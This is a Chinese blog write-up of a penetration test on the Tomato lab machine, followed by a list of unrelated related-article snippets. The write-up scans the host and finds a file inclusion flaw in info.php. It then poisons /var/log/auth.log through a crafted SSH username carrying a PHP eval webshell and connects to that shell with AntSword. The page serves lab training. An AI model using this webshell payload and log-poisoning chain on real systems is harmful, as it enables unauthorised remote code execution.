文件包含漏洞Tomato靶机渗透_详解
一、导入靶机
将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径
虚拟机设置里修改网络状态为NAT模式
二、信息收集
1、主机发现
用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.141
2、端口扫描
用御剑端口扫描扫描全端口
发现21、2211、80、25、1100和8888端口开启
3、访问Web服务
网页上访问192.168.204.141,出现一个大特码头
访问192.168.47.129:8888,弹出一个登录框
4、目录扫描
使用kali的dirb进行目录扫描:dirb http://192.168.204.141/
扫描结果如下
访问antibot_image目录
发现有一个info.php文件
点开发现是一个PHP的探针文件
查看info.php的网页源码,发现存在文件包含漏洞
三、漏洞利用
在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)
成功显示,说明存在文件包含漏洞
前面扫描出来的2211、25还有其他几个不常的见的端口不知道是干什么的,所以使用kali命令扫描nmap -A 192.168.204.141 -p-
扫描出来2211,是ssh远程连接端口
此时我们报错连接 2211
ssh '<?php @eval($_POST['cmd']);?>'@192.168.204.141 -p 2211
然后在网页端查看ubuntu报错信息:/var/log/auth.log
/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。
该目录下发现多了一些报错信息,木马大概率写入成功,
使用蚁剑进行连接,上传了一句话木马的路径:
http://192.168.204.141/antibot_image/antibots/info.php?image=/var/log/auth.log
连接密码是刚刚POST传入的:cmd
成功登陆到靶机
相关文章:
文件包含漏洞Tomato靶机渗透_详解
一、导入靶机 将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径 虚拟机设置里修改网络状态为NAT模式 二、信息收集 1、主机发现 用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.141 2、端口扫描 用御剑端口扫描扫描全…...
湖北汽车工业学院-高等数学考纲
湖北汽车工业学院2024年普通专升本考试的《高等数学》考试大纲已经公布。考试形式为闭卷笔试,满分100分,考试时间为90分钟。考试内容主要包括以下几个部分: 1. **函数、极限、连续**: 涉及函数概念、表示法、有界性、周期性、奇偶…...
Linux:Xshell相关配置及前期准备
一、Linux的环境安装 1、裸机安装或者是双系统 2、虚拟机的安装 3、云服务器(推荐)——>安装简单,维护成本低,学习效果好,仿真性高(可多人一起用一个云服务器) 1.1 购买云服务器 使用云服…...
模型 正态分布(通俗解读)
系列文章 分享 模型,了解更多👉 模型_思维模型目录。随机世界的规律,大自然里的钟形曲线。 1 正态分布的应用 1.1 质量管理之六西格玛 六西格玛是一种旨在通过识别和消除缺陷原因来提高制造过程或业务流程质量的管理策略。我们先来了解下六…...
安装了Vue-pdf后,打包文件多出了worker.js和worker.js.gz
解决方式: 修改node_modules/worker-loader/dist/index文件 将 const filename _loaderUtils2.default.interpolateName(this, options.name || 中的 js/[hash].worker.js,更改为 static/js/[hash].worker.js...
使用excel生成国际化多语言js文件的脚本
1、创建一个空文件夹 2、终端 cnpm install xlsx3、在文件夹创建一个index.js // 导入 Node.js 内置的 fs 模块 const fs = require(fs); // 导入 xlsx 模块,用于处理 Excel 文件 const XLSX = require(xlsx);// 读取 Excel 文件 function readExcelFile(filePath) {const …...
【蝉联】摩斯再次获得“中国隐私计算市场份额第一”
蝉联第一 8月2日,全球领先的IT市场研究和咨询公司IDC发布了《中国隐私计算平台厂商市场份额,2023》报告。蚂蚁集团凭借商用隐私计算平台摩斯(MORSE),以 35.3%的市场份额蝉联第一。 2023年,中国隐私计算平台…...
安装 qcloud-python-sts 失败 提示 gbk codecs decode byte 应该如何解决
安装 qcloud-python-sts 失败 提示 gbk codecs decode byte 应该如何解决 解决方案: 将windows 修改为utf-8编码格式 解决步骤如下: 1. 进入控制台 2. 点击区域 4. 点击管理 4.勾选UTF-8 5.重启系统即可...
mv:自动对焦代码
try:# The camera will now focus on whatever is in front of it.sensor.ioctl(sensor.IOCTL_TRIGGER_AUTO_FOCUS) except:raise (Exception("Auto focus is not supported by your sensor/board combination."))...
【C++】数组案例 五只小猪称体重
题目:给出物质小猪体重,找出最大的体重的值并打印 思路:利用菽粟写入五只小猪的体重,让每一个元素都赋值给一个整型变量并每赋值一次就于下一个数组中的元素比,若是大就继续赋值给这个变量,若是小则不赋值…...
Bug 解决 | 后端项目无法正常启动,或依赖服务连接失败
目录 1、版本问题 2、依赖项问题 明明拷贝的代码,为什么别人行,我启动就报错? 这篇文章我就理一下最最常见的项目启动报错的两种原因! 1、版本问题 比如明明项目的 Java 版本是 8,你非得拿 5 跑?那不是…...
Linux: network: mlx5_core crash;dos
https://bugzilla.redhat.com/show_bug.cgi?idCVE-2024-41090 https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id8be915fc5ff9a5e296f6538be12ea75a1a93bdea https://www.openwall.com/lists/oss-security/2024/07/24/4 是tap的驱动向下传递的包…...
用手机剪辑视频素材从哪里找?用手机视频素材库分享
视频编辑是一门充满创意的艺术,无论是制作短片、广告还是个人Vlog,都离不开高质量的视频素材。如果自己拍摄的素材不能完全满足创作需求,或者需要更多样化的内容来丰富视频,那么优质的视频素材来源至关重要。下面推荐几个提供高品…...
DataStream API使用Sink及自定义Sink
目录 Data Sinks 案例 自定义Sink Human实体类 自定义RichSinkFunction MySQL Sink使用 测试 Data Sinks 数据接收器(Data sinks)消费数据流并将它们转发到文件、套接字、外部系统或打印它们。Flink带有各种内置输出格式,这些格式被封装在数据流的算子后面: …...
- 类型支持 (类型属性,检查类型是否拥有强结构相等性,std::has_strong_structural_equality))
C++标准模板(STL)- 类型支持 (类型属性,检查类型是否拥有强结构相等性,std::has_strong_structural_equality)
类型特性 类型特性定义一个编译时基于模板的结构,以查询或修改类型的属性。 试图特化定义于 <type_traits> 头文件的模板导致未定义行为,除了 std::common_type 可依照其所描述特化。 定义于<type_traits>头文件的模板可以用不完整类型实例…...
《中国数据库前世今生》观影——2000年代/数据库分型及国产数据库开端
引出 《中国数据库前世今生》观影——2000年代/数据库分型及国产数据库开端 第3集:2000年代/数据库分型及国产数据库开端 y2k问题 千年虫,又叫做“计算机2000年问题”“电脑千禧年千年虫问题”或“千年危机”。缩写为“Y2K]”。是指在某些使用了计算机…...
图的同态Graph Homomorphism与同构Graph Isomorphism
图的同态Graph Homomorphism 图的同态(Graph Homomorphism)是图论中的一个重要概念,用于描述图之间的一种映射关系。图的同态描述了一个图如何通过映射保留其边的结构。 ### 图的同态定义 设有两个图 \( G (V_G, E_G) \) 和 \( H (V_H, …...
使用 Python 对雷达卫星 sar 图像进行降噪的三种方法
合成孔径雷达 (SAR) 图像广泛应用于各种领域(航空航天、军事、气象等)。问题是这种图像在其原始格式中受到噪点的影响。虽然这些图像通常也是沉重的文件,但从科学的角度来看,有效地对其进行去噪的任务似乎既具有挑战性,又在现实世界中非常有用。 卫星图像有两大类: 光学…...
C# Unity 面向对象补全计划 之 初识继承方法与多态
本文仅作学习笔记与交流,不作任何商业用途,作者能力有限,如有不足还请斧正 本系列旨在通过补全学习之后,给出任意类图都能实现并做到逻辑上严丝合缝 1.继承方法 C# & Unity 面向对象补全计划 之 继承(字段与属性&…...
突破PyCharm索引瓶颈:提升文件索引速度的策略
突破PyCharm索引瓶颈:提升文件索引速度的策略 PyCharm作为Python开发者的首选IDE,以其强大的功能和灵活的配置而广受好评。然而,当处理大型项目或复杂文件结构时,文件索引慢的问题可能会显著降低开发效率。本文将提供一系列优化技…...
Arduino控制步进电机全攻略:从脉冲计算到加速曲线优化
Arduino控制步进电机全攻略:从脉冲计算到加速曲线优化 引言:为什么需要精准控制步进电机? 在创客和嵌入式开发领域,步进电机因其精准的开环控制特性而广受欢迎。不同于普通直流电机,步进电机能够通过精确控制脉冲数量来…...
)
再生资源行业的数字涅槃:SAP如何驱动“制造+服务”一体化转型(PPT)
“在循环经济与‘双碳’战略的双重驱动下,再生资源企业正从传统的‘收-储-售’贸易商,向集设备全生命周期管理、高端再制造、专业化总包服务于一体的综合解决方案提供商跃迁。这场深刻的商业模式变革,呼唤一个能够贯通‘制造’与‘服务’、融…...
创意工作者利器:OpenClaw驱动Qwen3-32B批量生成营销文案
创意工作者利器:OpenClaw驱动Qwen3-32B批量生成营销文案 1. 为什么需要自动化文案生成 作为长期从事数字营销的自由职业者,我每天需要为不同客户产出大量营销文案。传统工作流程中,我需要反复查阅产品文档、手动调整关键词密度、为不同平台…...
)
从气泡到裂纹:手把手教你用YOLOv11-seg-LSCD搭建树脂缺陷检测系统(附完整数据集与代码)
从零构建树脂缺陷检测系统:YOLOv11-seg-LSCD实战指南 树脂制品在工业生产中应用广泛,但生产过程中难免会出现气泡、裂纹等缺陷。传统的人工检测方法不仅效率低下,而且容易受到主观因素影响。本文将带你从零开始,使用YOLOv11-seg-L…...
OpenClaw+nanobot智能客服:个人网站问答机器人搭建
OpenClawnanobot智能客服:个人网站问答机器人搭建 1. 为什么选择OpenClawnanobot组合 去年运营个人技术博客时,我经常收到读者在非工作时间发来的技术咨询。作为独立开发者,很难做到7x24小时在线回复,但让用户等待又会影响体验。…...
让 Claude Code 帮你“看家“:Hooks 与 /loop 入门
让 Claude Code 帮你"看家":Hooks 与 /loop 入门 上周我把一个重构任务扔给 Claude,出门开了两小时会。回来发现它把 .env.production 改了。 那一刻我才意识到,单纯会用 Claude Code 还不够,你还得学会怎么管住它。折…...
俄罗斯莫斯科电子烟展:跟团公司高性价比选择策略拆解
对于想开拓俄罗斯市场的电子烟企业来说,俄罗斯莫斯科电子烟展是不可错过的出海窗口,但行业信息杂乱、代理鱼龙混杂的现状,让很多企业陷入“选便宜还是选靠谱”的两难。选对跟团公司,不仅能节省成本,更能直接决定参展效…...
)
SEO_10个提升网站排名的SEO优化技巧分享(80 )
SEO优化技巧:提升网站排名的10个秘诀 在当今竞争激烈的互联网市场中,网站的排名直接关系到它的流量和商业成功。SEO(搜索引擎优化)技巧的掌握能够显著提升网站在搜索引擎中的曝光度。本文将分享十个提升网站排名的SEO优化技巧&…...
python-数字中药材资源共享平台vue
目录需求分析与架构设计前端实现(Vue 3 TypeScript)后端实现(Python)数据库设计开发与测试流程部署方案关键代码示例(FastAPI Vue)注意事项项目技术支持源码获取详细视频演示 :文章底部获取博…...
)
R语言实战:单因素方差分析从数据导入到结果解读(附完整代码)
R语言实战:单因素方差分析从数据导入到结果解读(附完整代码) 当你第一次面对一组实验数据,试图比较不同处理组间的差异时,单因素方差分析(One-way ANOVA)往往是首选方法。作为R语言数据分析的基…...